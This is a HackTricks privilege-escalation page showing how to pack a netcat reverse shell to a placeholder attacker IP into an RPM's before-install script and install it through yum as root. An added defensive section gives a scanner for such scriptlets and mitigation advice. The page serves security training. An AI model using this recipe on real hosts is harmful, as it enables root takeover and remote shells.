hacktricks/linux-unix/privilege-escalation/exploiting-yum.md
2024-02-10 17:52:19 +00:00


Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Further examples for yum can also be found on GTFOBins.

Executing arbitrary commands via RPM Packages

Checking the Environment

To leverage this vector, the user must be able to execute yum commands as a higher-privileged user, i.e. root.

A working example of this vector

A working example of this exploit can be found in the Daily Bugle room on TryHackMe.

Packing an RPM

In the following section, I will cover packaging a reverse shell into an RPM using fpm.

The example below creates a package that includes a before-install trigger with an arbitrary script that can be defined by the attacker. When installed, this package will execute the arbitrary command. I've used a simple reverse netcat shell example for demonstration but this can be changed as necessary.

EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR

Catching a shell

Using the above example and assuming yum can be executed as a higher-privileged user.

  1. Transfer the rpm to the host
  2. Start a listener, such as a netcat listener
  3. Install the vulnerable package: yum localinstall -y exploited-1.0-1.noarch.rpm
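
From the defender's side, the before-install script described above becomes the package's preinstall scriptlet, which `rpm -qp --scripts` prints without installing anything. The check below is an added example, not part of the original page: the function name `flag_scriptlets`, the pattern list and both sample inputs are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (defensive): list suspicious lines in an RPM's scriptlets
# before the package is installed as root.
# Real use:  rpm -qp --scripts ./package.rpm | flag_scriptlets
# Assumption: the patterns are an illustrative heuristic, not a complete list.
flag_scriptlets() {
    awk '
        # Section headers look like "preinstall scriptlet (using /bin/sh):"
        /^[a-z]+ scriptlet \(using [^)]*\):$/ { section = $1; next }
        # Inside a scriptlet: network tools, /dev/tcp, or a download piped to a shell
        section != "" && (/(^|[^A-Za-z0-9_])(nc|ncat|netcat|socat)([^A-Za-z0-9_]|$)/ ||
                          /\/dev\/tcp\// ||
                          /(curl|wget)[^|]*\|[ \t]*(ba)?sh/) {
            printf "%s: %s\n", section, $0
            hits++
        }
        # Exit 0 when something was flagged, 1 when nothing matched
        END { exit (hits > 0 ? 0 : 1) }
    '
}

# Constructed sample: scriptlet listing for a package built like the one above
# (placeholders kept exactly as they appear on the page).
sample_suspicious() {
    cat <<'EOF'
preinstall scriptlet (using /bin/sh):
nc -e /bin/bash <ATTACKER IP> <PORT>
EOF
}

# Constructed sample: scriptlets of an ordinary service package.
sample_benign() {
    cat <<'EOF'
preinstall scriptlet (using /bin/sh):
getent group app >/dev/null || groupadd -r app
postinstall scriptlet (using /bin/sh):
systemctl daemon-reload
EOF
}

# Demo on the constructed samples
if sample_suspicious | flag_scriptlets; then
    echo "review the package before installing"
fi
```

A clean result only means none of the listed patterns matched; the lasting mitigation is not granting yum, dnf or rpm to unprivileged users through sudo.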